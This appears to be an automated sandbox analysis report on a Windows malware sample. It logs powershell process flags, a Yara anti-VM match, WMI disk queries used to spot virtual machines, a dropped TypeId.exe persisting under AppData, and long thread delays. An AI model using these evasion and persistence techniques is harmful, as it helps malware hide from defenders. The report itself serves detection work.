Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_1248.TXT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE\
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG66
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT/E
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXER
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: !TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINSTA0\DEFAULT
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEWINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.C
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEV
Source: TypeId.exe, 00000002.00000002.2150010179.000002183E06B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 68PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_1248.TXT
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEEPT]#
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2135131291.0000023435541000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE?
Source: TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEP^
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE\|
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 9C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE$Z
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEINE
Source: TypeId.exe, 00000007.00000002.2585257546.00000021F43E1000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: !C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEI
Source: TypeId.exe, 00000002.00000002.2162900944.0000021856A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0\USAGELOGS\TYPEID.EXE.LOG
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE{"!0N
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEIN
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ?C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG`_
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E53E000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163987282.0000021856C4A000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2163184946.0000021856AC4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149486171.000002183C580000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2589739106.00000209253D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2125823994.000002341AFA2000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CD1F000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150286073.000002183E0F4000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E5A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE</COMMAND>
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 8C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE8
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: N\MICROSOFT\WINDOWS\AUDITRULETYPE\TYPEIDETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.0000020925140000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXEPDATA\ROAMINGCOMMONPROGRAMFILEAMPL
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2136881834.0000023435705000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2149792202.000002183E051000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C332000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXEWQD
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TATEC:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_1248.TXTPE,<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E542000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2148167261.000000A85ABE1000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXET5
Source: TypeId.exe, 00000007.00000002.2586408663.000002092517A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE+G
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2137559195.0000023435783000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \TYPEID.EXE<
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGAK&D
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C2C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE-<
Source: TypeId.exe, 00000007.00000002.2586408663.0000020925148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319;C:\WINDOWS\SYSTEM32;C:\WINDOWS\SYSTEM;C:\WINDOWS;.;C:\PROGRAM FILES (X86)\COC:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXENDOWS;C-E
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E519000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @FILE:///C:/USERS/user/APPDATA/ROAMING/AUDITRULETYPE/TYPEID.EXE
Source: TypeId.exe, 00000002.00000002.2148564813.000002183C32D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIGTK
Source: TypeId.exe, 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TYPEID.EXE2
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2136717499.00000234356D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1003YPEID.EXE
Source: TypeId.exe, 00000007.00000002.2586408663.00000209251A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\USERS\user\APPDATA\ROAMING\AUDITRULETYPE\TYPEID.EXE.CONFIG

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Memory allocated: 2341C7D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Memory allocated: 23434990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 2183C4A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 218561C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Memory allocated: 1B070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 20925400000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Memory allocated: 2093ECE0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000	Jump to behavior
